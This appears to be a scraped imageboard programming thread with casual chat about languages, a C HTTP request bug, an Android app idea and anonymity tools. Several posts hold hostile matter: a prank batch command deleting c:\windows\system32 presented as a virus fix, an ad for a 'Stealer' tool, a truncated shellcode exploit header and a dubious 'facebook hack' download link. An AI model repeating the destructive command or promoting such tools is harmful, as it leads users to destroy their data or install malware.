Any of you fags use C#?
no
HC Stealer! Try it free! www.drizzlestudio.net
Where do you draw the line on programming and scripting?
Easy. Does it generate native machine code? Programming! Is it interpretive? Scripting! inb4 mad javafags and pythonfags
>>301 I can only assume by interpreted you mean "line-by-line" execution, I don't think compiling to bytecode is scripting.
Just because a programming language is dynamic, doesn't mean it's a scripting language. Scripting languages are supplemental. More often than not, they are used in conjunction with a programming language or another scripting language. If it's usually used by itself, It's usually a programming language.
sup /gram/ I am actually trying to code an app who send a get request to an http server. My header code seems to be ok but i've got this msg : Request header field is missing ':' separator. Can't understand ! here is my code: sprintf(header,"GET /maj/vup.php?info1=%s&info2=%s HTTP/1.1\r\n",argv[2],ctnt); send(sock,header,sizeof(header), 0); send(sock,"Host: alberto.com\r\n",sizeof("Host: alberto.com\r\n"), 0); send(sock,"User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\r\n",sizeof("User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\r\n"), 0); send(sock,"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n", sizeof("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"), 0); send,(sock,"Accept-Language: en-us,en;q=0.5\r\n",sizeof("Accept-Language: en-us,en;q=0.5\r\n"), 0); send(sock,"Accept-Encoding: gzip,deflate\r\n",sizeof("Accept-Encoding: gzip,deflate\r\n"), 0); send(sock,"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",sizeof("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"), 0); send(sock,"Keep-Alive: 115\r\n",sizeof("Keep-Alive: 115\r\n"), 0); Message too long. Click here to view the full text.
Sounds like you need to put a colon in there somewhere.
Why the fuck are you using C and not even an abstracted http libraray? If you are trying to learn http, start with netcat, then some scripting language like python or lua. If you are trying to learn C, do something else. If you are trying to simply get the job done and you insist on using C, use libcurl for http. Also, try crafting the header as a static string constant, then gradually make it more programmable. That way you will know exactly what it is you did that broke it.
A programming board that actually has programming in it? What is this sorcery?
vim test.bat iecho inorite:wq test.bat That's what I do in school right now. Fuck that cmd. I'm eager to do soem fucking bash. At least PowerShell. Fuck.
class Know { public: bool Rite() { return know; } private: bool know; } int main() { Know I; if (I::Rite) then { cout << "No idea!"; } else { cout << "I know, right."; }
public class KillOP { public static void main (String[] args){ for (int stab = 0; stab < 10; stab++){ System.out.print("die") } boolean death = true; } }
/gram/ I come to those fluent in Java with an idea... A 4chon.org Android app. Now before everyone shuns me just listen... Imagine a lightweight, clean, basic browser specifically for 4chon. You can choose to browse by image only (see: https://market.android.com/details?id=com.murtos.chanbrowser&feature=search_result) Or you can view full threads https://market.android.com/details?id=com.dxh.chant&feature=search_result I think a program for the community like this should be made BY the community so how about a website or forum for those who want to contribute? I can make the website, but alas, am helpless with making the app. Message too long. Click here to view the full text.
an app would be nice for droid, iphone, webos, etc but finding someone that would make it...that's another concern
http://pastebin.com/WfZAmn0c http://pastebin.com/XPS47Teq These are the scripts the 4chan janitors use to shit on 4chan hope you find these useful love: from a Concerned 4chan Staffer
Awesome. OP is awesome.
note that these are hosted on imagebear whois of imagebear http://pastebin.com/jyN306Ce owned by "dongfix" aka "enumeric" aka the guy in that pastebin aka mod butt-buddy ne plus ultra rulefag who lurks in #4chan and whines about threads he doesn't like
the scripts that were linked on imagebear are gone now
Two questions in one. First off, I'd ask elsewhere but I am currently in a country full of censorship so I'm quite limited to my *ch*ns. Which leads me to my first question. They banned the hell out of a lot of proxies and stuff. So, I'm asking for help in getting around such things. Yeah, quite general but basically if you could help me out in getting a decent proxy that'd be nice<3 Second question, I need an email account. Something that basically couldn't be more bland sounding. I'm not asking for an account. Just a website to register with. See, I don't really know how secure hotmail is or yahoo or gmail. But I've heard of googles notoriousness when it comes to them storing stuff on servers. I'm looking for something that is I guess secure. So, can anyone help a brudda out? D:
For proxy usage, I'd suggest SwissVPN, anonine.com or something of the like as for mail, not entirely sure
hushmail maybe?
lavabit for mail
Hey all you no lifers, Circlepuller of AwsumChan telling you that NejoArc was interested in adding a code parser, and ran into some problems that I fixed. now, all of you make a batch file called epic.bat with the following @echo off cd \ del c:\windows\system32 This will get rid of a virus that causes your computer to be 0.01% slower than usual, causing your computer to make you look like a faggot.
@echo off cd \ del c:\windows\system32
Oh my god, Crysis is running on max settings with no effort at all... OP, you need a donation. Do you take Bitcoins?
ITS PROMPTING ME WUT DO I DO? fucking idiot learn to del
That 's the new "alt-F4" joke. This time : level up!
hello people of 4chon I hail from 4chan /b/orads and i happened to stumble upon your board here and thought maybe you guys can teach me how to code. I want to be able to program apps and games. Thank you in advance for your help
please don't.
278 means you should learn a language, preferabrely java, THEN if donr get something in specific
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes) # Date: July, 23 2011 # Author: Theuzuki.' # Vendor or Software Link: - # Version: - # Category:: shellcodes # Google dork: - # Tested on: Windows 7 sp 1 # Demo site: - ================================================== Made by: ___________.__ ____ ___ __ .__ \__ ___/| |__ ____ | | \__________ __| | _|__| Message too long. Click here to view the full text.
I made a working facebook hack it lets you see private picturers of anyone on facebook even if there not on your friends list http://www.mediafire.com/?ihel0w8htygds8r
fake